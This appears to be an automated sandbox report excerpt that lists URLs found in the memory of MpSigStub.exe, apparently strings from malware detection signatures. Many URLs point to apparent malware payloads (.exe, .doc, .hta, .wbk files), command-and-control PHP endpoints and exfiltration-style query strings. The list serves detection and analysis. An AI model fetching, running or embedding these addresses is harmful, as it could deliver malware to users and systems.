Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://121.14.
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://122.228.228.7
Source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp String found in binary or memory: http://123support.online/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://123zphimonline.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/down/list2.txt
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/m.htmwidth=0height=0
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1/tracking?source=
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:20202/remind.html
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:27777/?inj=http://
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:5
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:5/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:5555/
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8000/web.html?url=yac.mx&rate=501&id=%s&key=%s&pm=1x
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8081/dial.html?
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8089/index.html?
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8332
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:8545
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://127.0.0.1:9600/IperiusHSa
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp String found in binary or memory: http://139.162.
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://144.217.14.173/doc.doc
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://149.20.4.69
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp String found in binary or memory: http://149.202.110.58/document_012001.doc
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://149.3.170.235/qw-fad/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://151.248.115.253/%sproc0%%sproc0%exit
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://152.89.218.86/
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://158.255.1.137/1/live.php
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://158.255.5.220
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp String found in binary or memory: http://159.8.31.231/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://162.241.124.111/q/1.gif
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://164.132.171.89/promo.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://165.227.7.138/index.hta
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://167.114.35.111/~miraclen/sul2/sul2.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://169.54.172.92/coreslibri.zip
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://170.130.55.135/api.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://172.16.1.1/exm.rtf
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://172.245.119.81/.----------------------.------------------------------.-/s.wbk
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://173.201.215.95/depmex/xhi05bs8.php?id=2809310
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp String found in binary or memory: http://173.208.139.170/s.txt
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://178.128.11.199/qtx.
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://178.128.115.182/wp-includes/3_y/
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp String found in binary or memory: http://178.62.19.66/campo/v/v
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp String found in binary or memory: http://178.79.137.25/campo/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp String found in binary or memory: http://179.43.158.187/PhtJFr0fvBk2.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://18.130.111.206/wp/x_y/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://181.174.166.137/sys/f4.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp String found in binary or memory: http://184.105.163.238/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://185.14.30.131/api.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://185.14.31.93/nuzq5lag7htb.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://185.141.25.168/check_attack/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp String found in binary or memory: http://185.153.198.216:8010/UserService
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://185.165.29.36/11.mov
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://185.183.98.14/fontsupdate.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://185.26.113.95:8095/batpower2.txt
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp String found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://188.127.254.159/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp String found in binary or memory: http://189.1.168.10/~festaefe/1024bit.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.191/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://191.101.239.86/root/migytkyt5bberd
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp String found in binary or memory: http://192.168.100.5/00ButtonTest.exe
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://192.3.31.211/index.php?macos=
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://192.99.214.32/word1.tmp
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://195.225.176.34/ad/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000024.00000003.6296880704.00000197A4AB8000.00000004.00000001.sdmp String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.163/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000024.00000003.6276556833.00000197A3CCB000.00000004.00000001.sdmp String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://200.98.
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://209.141.35.239/33/
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000024.00000003.6334085897.00000197A4B7F000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://216.172.154.248/pic/img.js
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp String found in binary or memory: http://216.93.188.81/
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000024.00000003.6280199077.00000197A44B4000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp String found in binary or memory: http://27.102.66.105/test.msi
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://27.192.62.107
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp String found in binary or memory: http://2p8s.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://3.0.242.71/wp-content/2_ur/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp String found in binary or memory: http://3/upload/all/Decrypter.exe
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp String found in binary or memory: http://31.210.20.225:8080/server.exe&quot;)
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://3286924353/jb.jar
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp String found in binary or memory: http://3389.space/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp String found in binary or memory: http://3dcpw.net/house/404.htm
Source: MpSigStub.exe, 00000024.00000003.6286857920.00000197A49B1000.00000004.00000001.sdmp String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
